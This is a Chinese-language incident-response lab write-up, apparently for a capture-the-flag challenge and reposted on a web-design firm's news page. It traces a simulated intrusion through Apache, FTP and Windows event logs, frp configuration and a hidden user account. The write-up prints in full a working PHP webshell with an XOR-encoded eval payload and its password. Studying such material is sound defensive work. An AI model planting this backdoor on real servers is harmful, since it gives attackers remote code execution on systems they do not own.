尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

应急响应web2

应急响应web2
📅 发布时间:2026/6/25 14:22:07

在解题前,请确保您已解的一下内容:

1.攻击者的IP地址(两个)?

2.攻击者的webshell文件名?

3.攻击者的webshell密码?

4.攻击者的QQ号?

5.攻击者的服务器伪IP地址?

6.攻击者的服务器端口?

7.攻击者是如何入侵的(选择题)?

8.攻击者的隐藏用户名?

一、两个ip地址

扫描出来是一个system.php文件

<?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $pass='hack6618'; $payloadName='payload'; $key='7813d1590d28a7dd'; if (isset($_POST[$pass])){ $data=encode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); if (strpos($payload,"getBasicsInfo")===false){ $payload=encode($payload,$key); } eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (strpos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } } }

这段PHP代码是一个典型的Webshell后门程序,用于在受感染的服务器上执行远程命令。

然后我们分析日志。

日志路径C:\phpstudy_pro\Extensions\Apache2.4.39\logs

192.168.126.135

接下来我们分析windows的系统日志,使用APT-Hunter工具的powershell日志收集器自动收集日志信息,将得到的日志解压。

Powershell:

cd C:\你的路径\APT-Hunter-3.2

解除系统默认脚本执行限制(仅首次需要):

Set-ExecutionPolicy RemoteSigned # 弹出提示输入 Y 确认

一键自动采集命令:

.\windows-log-collector-full-v3-CSV.ps1

使用 APT-Hunter 主 Python 脚本自动分析这批日志:

python APT-Hunter.py -p C:\Users\Administrator\Desktop\logs\wineventlog -o Project1 -allreport -p:提供包含使用powershell日志收集器提取的日志的解压路径 -o:输出生成项目的名称

192.168.126.129

二、攻击者的webshell文件名?

system.php

三、攻击者的webshell密码?

hack6618

四、攻击者的QQ号?

Tecent files 腾讯文件(可能指的是QQ之类的)

攻击者的QQ号:777888999321

五、攻击者的服务器伪IP地址?

在隐藏用户的文件中搜集信息:

FileRecv为QQ的接收的文件夹,发现frp内网穿透工具

找到配置信息查看:

256.256.66.88

六、攻击者的服务器端口?

65536

七、攻击者是如何入侵的(选择题)?

查看ftp日志文件:

分析日志文件,查找后门system.php文件,发现正在进行爆破

八、攻击者的隐藏用户名?

hack887


成功

相关新闻

  • 从规则引擎到大语言模型:NLP范式迁移的工程本质
  • 我们是如何管理多环境(开发、测试、生产)配置的?
  • 3分钟搞定Mac NTFS读写难题:Free-NTFS-for-Mac免费终极解决方案

最新新闻

  • 博客系统接口需求分析:从模块拆解到自动化测试设计
  • 机器学习小数据训练实战:四维评估与高效落地方法
  • CVE-2018-12613漏洞剖析:从文件包含到代码执行的攻防实战
  • LTE-M、NB-IoT、Cat-1 bis:海外部署时应该如何选
  • 27.继电器思维转不过来?读懂 PLC 五层扫描周期,才算真正学会 PLC 编程
  • SQL注入漏洞

日新闻

  • 利用微PE工具箱进行系统安装教程
  • 渗透测试十大核心工具实战指南:从信息搜集到报告生成全流程解析
  • 暗黑破坏神2存档编辑器:网页版角色修改工具完全指南

周新闻

  • Visual C++运行库修复终极指南:5分钟快速解决Windows软件启动错误
  • 手把手教你构建统计局地区经济数据爬虫:从环境搭建到数据持久化全指南
  • 2026多Agent深度解析:用AI团队替代单一模型,四种架构实战落地

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号